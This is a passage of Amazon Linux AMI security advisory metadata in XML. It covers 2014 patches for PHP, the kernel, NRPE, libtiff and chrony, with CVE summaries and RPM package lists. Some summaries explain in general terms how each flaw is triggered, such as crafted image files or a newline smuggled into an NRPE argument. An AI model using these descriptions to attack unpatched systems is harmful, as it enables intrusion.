name="php54-mysql" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.29-1.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-362</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-362: medium priority package update for php55</title><issued date="2014-06-15 16:29:00" /><updated date="2014-09-19 10:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0238:
The cdf_read_property_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (infinite loop or out-of-bounds memory access) via a vector that (1) has zero length or (2) is too long.
1098155:
CVE-2014-0238 file: CDF property info parsing nelements infinite loop
CVE-2014-0237:
The cdf_unpack_summary_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (performance degradation) by triggering many file_printf calls.
1098193:
CVE-2014-0237 file: cdf_unpack_summary_info() excessive looping DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237" title="" id="CVE-2014-0237" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238" title="" id="CVE-2014-0238" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-recode" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.13" release="3.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.13-3.74.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.13-3.74.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.13" release="3.74.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.13-3.74.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-363</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-363: medium priority package update for kernel</title><issued date="2014-06-15 16:30:00" /><updated date="2014-09-19 10:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3153:
The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.
1103626:
CVE-2014-3153 kernel: futex: pi futexes requeue issue
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153" title="" id="CVE-2014-3153" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.10.42" release="52.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.10.42-52.145.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.10.42" release="52.145.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="kernel" version="3.10.42" release="52.145.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.10.42" release="52.145.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.10.42" release="52.145.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.10.42" release="52.145.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.10.42" release="52.145.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="perf" version="3.10.42" release="52.145.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.10.42-52.145.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.10.42" release="52.145.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.10.42-52.145.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-364</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-364: important priority package update for nrpe</title><issued date="2014-06-26 10:29:00" /><updated date="2014-09-19 10:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2913:
1089878:
CVE-2014-2913 nrpe: remote command execution when command arguments are enabled
** DISPUTED ** Incomplete blacklist vulnerability in nrpe.c in Nagios Remote Plugin Executor (NRPE) 2.15 and earlier allows remote attackers to execute arbitrary commands via a newline character in the -a option to libexec/check_nrpe. NOTE: this issue is disputed by multiple parties. It has been reported that the vendor allows newlines as "expected behavior." Also, this issue can only occur when the administrator enables the "dont_blame_nrpe" option in nrpe.conf despite the "HIGH security risk" warning within the comments.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2913" title="" id="CVE-2014-2913" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nrpe-debuginfo" version="2.15" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/nrpe-debuginfo-2.15-2.7.amzn1.x86_64.rpm</filename></package><package name="nrpe" version="2.15" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/nrpe-2.15-2.7.amzn1.x86_64.rpm</filename></package><package name="nagios-plugins-nrpe" version="2.15" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-plugins-nrpe-2.15-2.7.amzn1.x86_64.rpm</filename></package><package name="nagios-plugins-nrpe" version="2.15" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-plugins-nrpe-2.15-2.7.amzn1.i686.rpm</filename></package><package name="nrpe-debuginfo" version="2.15" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/nrpe-debuginfo-2.15-2.7.amzn1.i686.rpm</filename></package><package name="nrpe" version="2.15" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/nrpe-2.15-2.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-365</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-365: medium priority package update for libtiff</title><issued date="2014-06-26 10:31:00" /><updated date="2014-09-19 10:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4244:
The LZW decompressor in the gif2tiff tool in libtiff 4.0.3 and earlier allows context-dependent attackers to cause a denial of service (out-of-bounds write and crash) or possibly execute arbitrary code via a crafted GIF image.
Multiple buffer overflow flaws were found in the gif2tiff tool. An attacker could use these flaws to create a specially crafted GIF file that could cause gif2tiff to crash or, possibly, execute arbitrary code.
996468:
CVE-2013-4244 libtiff (gif2tiff): OOB Write in LZW decompressor
CVE-2013-4243:
Multiple buffer overflow flaws were found in the gif2tiff tool. An attacker could use these flaws to create a specially crafted GIF file that could cause gif2tiff to crash or, possibly, execute arbitrary code.
Heap-based buffer overflow in the readgifimage function in the gif2tiff tool in libtiff 4.0.3 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted height and width values in a GIF image.
996052:
CVE-2013-4243 libtiff (gif2tiff): possible heap-based buffer overflow in readgifimage()
CVE-2013-4232:
Use-after-free vulnerability in the t2p_readwrite_pdf_image function in tools/tiff2pdf.c in libtiff 4.0.3 allows remote attackers to cause a denial of service (crash) or possible execute arbitrary code via a crafted TIFF image.
A heap-based buffer overflow and a use-after-free flaw were found in the tiff2pdf tool. An attacker could use these flaws to create a specially crafted TIFF file that would cause tiff2pdf to crash or, possibly, execute arbitrary code.
995975:
CVE-2013-4232 libtiff (tiff2pdf): use-after-free in t2p_readwrite_pdf_image()
CVE-2013-4231:
Multiple buffer overflows in libtiff before 4.0.3 allow remote attackers to cause a denial of service (out-of-bounds write) via a crafted (1) extension block in a GIF image or (2) GIF raster image to tools/gif2tiff.c or (3) a long filename for a TIFF image to tools/rgb2ycbcr.c. NOTE: vectors 1 and 3 are disputed by Red Hat, which states that the input cannot exceed the allocated buffer size.
Multiple buffer overflow flaws were found in the gif2tiff tool. An attacker could use these flaws to create a specially crafted GIF file that could cause gif2tiff to crash or, possibly, execute arbitrary code.
995965:
CVE-2013-4231 libtiff (gif2tiff): GIF LZW decoder missing datasize value check
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4231" title="" id="CVE-2013-4231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4232" title="" id="CVE-2013-4232" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4243" title="" id="CVE-2013-4243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4244" title="" id="CVE-2013-4244" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-devel" version="4.0.3" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-15.19.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-15.19.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-15.19.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-15.19.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="15.19.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-15.19.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="15.19.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-15.19.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="15.19.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-15.19.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="15.19.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-15.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-366</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-366: low priority package update for chrony</title><issued date="2014-07-09 16:20:00" /><updated date="2014-09-19 10:27:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0021:
1054790:
CVE-2014-0021 chrony: DDoS via amplification in cmdmon protocol
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0021" title="" id="CVE-2014-0021" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="chrony-debuginfo" version="1.29.1" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/chrony-debuginfo-1.29.1-1.8.amzn1.x86_64.rpm</filename></package><package name="chrony" version="1.29.1" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/chrony-1.29.1-1.8.amzn1.x86_64.rpm</filename></package><package name="chrony" version="1.29.1" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/chrony-1.29.1-1.8.amzn1.i686.rpm</filename></package><package name="chrony-debuginfo" version="1.29.1" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/chrony-debuginfo-1.29.1-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-367</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-367: medium priority package update for php54</title><issued date="2014-07-09 16:24:00" /><updated date="2014-09-19 10:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4049:
Heap-based buffer overflow in the php_parserr function in ext/standard/dns.c in PHP 5.6.0beta4 and earlier allows remote servers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted DNS TXT record, related to the dns_get_record function.
1108447:
CVE-2014-4049 php: heap-based buffer overflow in DNS TXT record parsing
CVE-2014-3981:
acinclude.m4, as used in the configure script in PHP 5.5.13 and earlier, allows local users to overwrite arbitrary files via a symlink attack on the /tmp/phpglibccheck file.
1104978:
CVE-2014-3981 php: insecure temporary file use in the configure script
CVE-2014-3515:
CVE-2014-3487:
1107544:
CVE-2014-3487 file: cdf_read_property_info insufficient boundary check
CVE-2014-3480:
1104858:
CVE-2014-3480 file: cdf_count_chain insufficient boundary check
CVE-2014-3479:
1104869:
CVE-2014-3479 file: cdf_check_stream_offset insufficient boundary check
CVE-2014-3478:
1104863:
CVE-2014-3478 file: mconvert incorrect handling of truncated pascal string size
CVE-2014-0207:
1091842:
CVE-2014-0207 file: cdf_read_short_sector insufficient boundary check
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207" title="" id="CVE-2014-0207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3478" title="" id="CVE-2014-3478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3479" title="" id="CVE-2014-3479" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3480" title="" id="CVE-2014-3480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3487" title="" id="CVE-2014-3487" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515" title="" id="CVE-2014-3515" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3981" title="" id="CVE-2014-3981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049" title="" id="CVE-2014-4049" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-mcrypt" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.30" release="1.56.amzn1" epoch="0" 